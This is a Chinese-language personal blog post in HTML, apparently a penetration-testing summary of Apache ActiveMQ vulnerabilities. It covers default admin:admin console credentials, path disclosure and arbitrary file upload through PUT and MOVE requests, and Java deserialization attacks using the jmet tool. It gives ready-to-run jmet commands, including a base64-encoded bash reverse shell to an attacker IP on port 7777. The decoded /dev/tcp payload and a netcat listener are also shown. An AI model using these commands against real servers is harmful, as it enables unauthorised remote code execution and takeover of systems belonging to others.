<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ActiveMQ漏洞总结," />










<meta name="description" content="ActiveMQ应用介绍1Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件；由于ActiveMQ是一个纯Java程序，因此只需要操作系统支持Java虚拟机，ActiveMQ便可执行。ActiveMQ 是一个完全支持JMS1.1 和J2EE 1.4规范的 JMSProvider实现，尽管 JMS 规范出台已经是很久的事情了，但是JMS在当今的J2EE应用中间仍然扮演">
<meta property="og:type" content="article">
<meta property="og:title" content="ActiveMQ漏洞总结">
<meta property="og:url" content="http://yoursite.com/2020/04/20/ActiveMQ%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="small_fish&#39;s_Blog">
<meta property="og:description" content="ActiveMQ应用介绍1Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件；由于ActiveMQ是一个纯Java程序，因此只需要操作系统支持Java虚拟机，ActiveMQ便可执行。ActiveMQ 是一个完全支持JMS1.1 和J2EE 1.4规范的 JMSProvider实现，尽管 JMS 规范出台已经是很久的事情了，但是JMS在当今的J2EE应用中间仍然扮演">
<meta property="og:image" content="http://yoursite.com/images/activemq/1.png">
<meta property="og:image" content="http://yoursite.com/images/activemq/2.png">
<meta property="og:image" content="http://yoursite.com/images/activemq/3.png">
<meta property="og:image" content="http://yoursite.com/images/activemq/4.png">
<meta property="og:image" content="http://yoursite.com/images/activemq/5.png">
<meta property="og:image" content="http://yoursite.com/images/activemq/6.png">
<meta property="og:image" content="http://yoursite.com/images/activemq/7.png">
<meta property="og:image" content="http://yoursite.com/images/activemq/8.png">
<meta property="og:image" content="http://yoursite.com/images/activemq/9.png">
<meta property="og:image" content="http://yoursite.com/images/activemq/10.png">
<meta property="article:published_time" content="2020-04-20T06:12:00.000Z">
<meta property="article:modified_time" content="2020-04-20T06:47:20.249Z">
<meta property="article:author" content="small_fish">
<meta property="article:tag" content="ActiveMQ漏洞总结">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/images/activemq/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/04/20/ActiveMQ漏洞总结/"/>





  <title>ActiveMQ漏洞总结 | small_fish's_Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">small_fish's_Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">我们欠生活一个“努力”</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/20/ActiveMQ%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="small_fish">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/touxiang.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="small_fish's_Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">ActiveMQ漏洞总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-04-20T14:12:00+08:00">
                2020-04-20
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web%E6%B8%97%E9%80%8F/" itemprop="url" rel="index">
                    <span itemprop="name">web渗透</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2020/04/20/ActiveMQ%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2020/04/20/ActiveMQ%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="ActiveMQ应用介绍"><a href="#ActiveMQ应用介绍" class="headerlink" title="ActiveMQ应用介绍"></a>ActiveMQ应用介绍</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件；由于ActiveMQ是一个纯Java程序，因此只需要操作系统支持Java虚拟机，ActiveMQ便可执行。ActiveMQ 是一个完全支持JMS1.1 和J2EE 1.4规范的 JMSProvider实现，尽管 JMS 规范出台已经是很久的事情了，但是JMS在当今的J2EE应用中间仍然扮演着特殊的地位。</span><br></pre></td></tr></table></figure>
<h2 id="ActiveMQ漏洞利用"><a href="#ActiveMQ漏洞利用" class="headerlink" title="ActiveMQ漏洞利用"></a>ActiveMQ漏洞利用</h2><h3 id="默认密码"><a href="#默认密码" class="headerlink" title="默认密码"></a>默认密码</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Console存在默认端口和默认密码/未授权访问(默认密码为admin:admin)</span><br><span class="line">开放端口：61616、8161，环境监听61616端口和8161端口，其中8161为web控制台端口</span><br></pre></td></tr></table></figure>
<p><img src="/images/activemq/1.png" alt="picture"></p>
<p>Web页面<a href="http://192.168.50.219:8161/" target="_blank" rel="noopener">http://192.168.50.219:8161/</a></p>
<p><img src="/images/activemq/2.png" alt="picture"></p>
<p>后台管理地址：<br><a href="http://192.168.50.219:8161/admin/" target="_blank" rel="noopener">http://192.168.50.219:8161/admin/</a></p>
<p><img src="/images/activemq/3.png" alt="picture"></p>
<h3 id="ActiveMQ物理路径泄漏漏洞"><a href="#ActiveMQ物理路径泄漏漏洞" class="headerlink" title="ActiveMQ物理路径泄漏漏洞"></a>ActiveMQ物理路径泄漏漏洞</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ActiveMQ默认开启PUT请求，当开启PUT时，构造好Payload(即不存在的目录)，Response会返回相应的物理路径信息</span><br></pre></td></tr></table></figure>
<p><img src="/images/activemq/4.png" alt="picture"></p>
<h3 id="ActiveMQ-PUT任意文件上传漏洞"><a href="#ActiveMQ-PUT任意文件上传漏洞" class="headerlink" title="ActiveMQ PUT任意文件上传漏洞"></a>ActiveMQ PUT任意文件上传漏洞</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。</span><br><span class="line"></span><br><span class="line">fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：</span><br><span class="line">其使用率并不高，文件操作容易出现漏洞</span><br><span class="line">所以，ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（你可以在conf/jetty.xml中开启之）；在5.14.0版本以后，彻底删除了fileserver应用。</span><br></pre></td></tr></table></figure>
<p>PUT开启上传fileserver目录</p>
<p><img src="/images/activemq/5.png" alt="picture"></p>
<p>MOVE协议开启，可上传ssh文件后移动至自启动cron目录</p>
<p><img src="/images/activemq/6.png" alt="picture"></p>
<h3 id="反序列化漏洞"><a href="#反序列化漏洞" class="headerlink" title="反序列化漏洞"></a>反序列化漏洞</h3><h4 id="新建目录"><a href="#新建目录" class="headerlink" title="新建目录"></a>新建目录</h4><h5 id="使用jmet进行创建目录"><a href="#使用jmet进行创建目录" class="headerlink" title="使用jmet进行创建目录"></a>使用jmet进行创建目录</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y <span class="string">"touch /tmp/sucess"</span> -Yp ROME   192.168.10.5   61616</span><br></pre></td></tr></table></figure>
<h5 id="创建队列中查看并点击执行"><a href="#创建队列中查看并点击执行" class="headerlink" title="创建队列中查看并点击执行"></a>创建队列中查看并点击执行</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.50.219:8161/admin/browse.jsp?JMSDestination=event</span><br></pre></td></tr></table></figure>
<p><img src="/images/activemq/7.png" alt="picture"></p>
<p><img src="/images/activemq/8.png" alt="picture"></p>
<h5 id="查看是否建立成功"><a href="#查看是否建立成功" class="headerlink" title="查看是否建立成功"></a>查看是否建立成功</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">进入容器查看</span><br><span class="line">docker ps</span><br><span class="line">docker exec -it dd10f418d325 &#x2F;bin&#x2F;bash</span><br></pre></td></tr></table></figure>
<p><img src="/images/activemq/9.png" alt="picture"></p>
<h4 id="反弹shell，bash命令需编码"><a href="#反弹shell，bash命令需编码" class="headerlink" title="反弹shell，bash命令需编码"></a>反弹shell，bash命令需编码</h4><h5 id="使用jmet反弹shell攻击"><a href="#使用jmet反弹shell攻击" class="headerlink" title="使用jmet反弹shell攻击"></a>使用jmet反弹shell攻击</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y <span class="string">"bash -c &#123;echo,YmFzaCAtaSAgPiYvZGV2L3RjcC8xOTIuMTY4LjUwLjI0Mi83Nzc3IDA+JjE=&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;"</span> -Yp ROME   192.168.50.217   61616</span><br><span class="line"></span><br><span class="line">注释：ubuntu不可以直接反弹shell,需要进行base64编码</span><br><span class="line">bash -i  &gt;&amp;/dev/tcp/192.168.50.242/7777 0&gt;&amp;1</span><br><span class="line">http://www.jackson-t.ca/runtime-exec-payloads.html</span><br></pre></td></tr></table></figure>
<h5 id="服务器接收反弹端口"><a href="#服务器接收反弹端口" class="headerlink" title="服务器接收反弹端口"></a>服务器接收反弹端口</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 7777</span><br></pre></td></tr></table></figure>
<p><img src="/images/activemq/10.png" alt="picture"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ActiveMQ%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/" rel="tag"># ActiveMQ漏洞总结</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/04/16/%E5%90%8E%E6%B8%97%E9%80%8F%E4%B8%8A%E4%BC%A0/" rel="next" title="后渗透上传">
                <i class="fa fa-chevron-left"></i> 后渗透上传
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/04/20/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" rel="prev" title="shiro反序列化漏洞">
                shiro反序列化漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/touxiang.jpg"
                alt="small_fish" />
            
              <p class="site-author-name" itemprop="name">small_fish</p>
              <p class="site-description motion-element" itemprop="description">记得来时的梦想</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#ActiveMQ应用介绍"><span class="nav-number">1.</span> <span class="nav-text">ActiveMQ应用介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ActiveMQ漏洞利用"><span class="nav-number">2.</span> <span class="nav-text">ActiveMQ漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#默认密码"><span class="nav-number">2.1.</span> <span class="nav-text">默认密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ActiveMQ物理路径泄漏漏洞"><span class="nav-number">2.2.</span> <span class="nav-text">ActiveMQ物理路径泄漏漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ActiveMQ-PUT任意文件上传漏洞"><span class="nav-number">2.3.</span> <span class="nav-text">ActiveMQ PUT任意文件上传漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#反序列化漏洞"><span class="nav-number">2.4.</span> <span class="nav-text">反序列化漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#新建目录"><span class="nav-number">2.4.1.</span> <span class="nav-text">新建目录</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#使用jmet进行创建目录"><span class="nav-number">2.4.1.1.</span> <span class="nav-text">使用jmet进行创建目录</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#创建队列中查看并点击执行"><span class="nav-number">2.4.1.2.</span> <span class="nav-text">创建队列中查看并点击执行</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看是否建立成功"><span class="nav-number">2.4.1.3.</span> <span class="nav-text">查看是否建立成功</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#反弹shell，bash命令需编码"><span class="nav-number">2.4.2.</span> <span class="nav-text">反弹shell，bash命令需编码</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#使用jmet反弹shell攻击"><span class="nav-number">2.4.2.1.</span> <span class="nav-text">使用jmet反弹shell攻击</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#服务器接收反弹端口"><span class="nav-number">2.4.2.2.</span> <span class="nav-text">服务器接收反弹端口</span></a></li></ol></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">small_fish</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: 'Q0UiVSehGW5QmeoKs4RjJDRj-gzGzoHsz',
        appKey: 'OkHgwMehx4Oy1VL9otvfdTSA',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  

  

  
  

  

  

  

</body>
</html>
